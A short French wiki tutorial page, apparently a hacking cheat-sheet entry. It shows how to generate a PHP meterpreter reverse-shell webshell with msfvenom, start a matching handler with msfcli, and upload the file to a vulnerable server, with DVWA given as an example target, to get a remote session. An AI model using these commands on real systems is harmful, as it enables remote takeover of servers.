ROOT webserver
Aller à la navigation
Aller à la recherche
| Fiche express | |
|---|---|
| Domaine | Exploitation web (PHP) |
| Outil | msfvenom / msfcli
|
| Payload | php/meterpreter_reverse_tcp
|
| Voir aussi | Veil · DVWA |
Génération d'un webshell PHP meterpreter avec msfvenom, déposé sur un serveur web vulnérable (par exemple via DVWA) pour obtenir une session.
Générer le payload
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.10 LPORT=81 -f raw > Desktop/shell.php
Lancer le handler
msfcli exploit/multi/handler LHOST=192.168.0.10 LPORT=81 PAYLOAD=php/meterpreter_reverse_tcp E
Encapsuler le fichier généré entre les balises PHP :
<?php /* contenu généré */ ?>
Déposer le fichier sur le serveur cible (via DVWA ou un upload vulnérable). À l'ouverture du fichier, une session meterpreter s'ouvre :
shell
whoami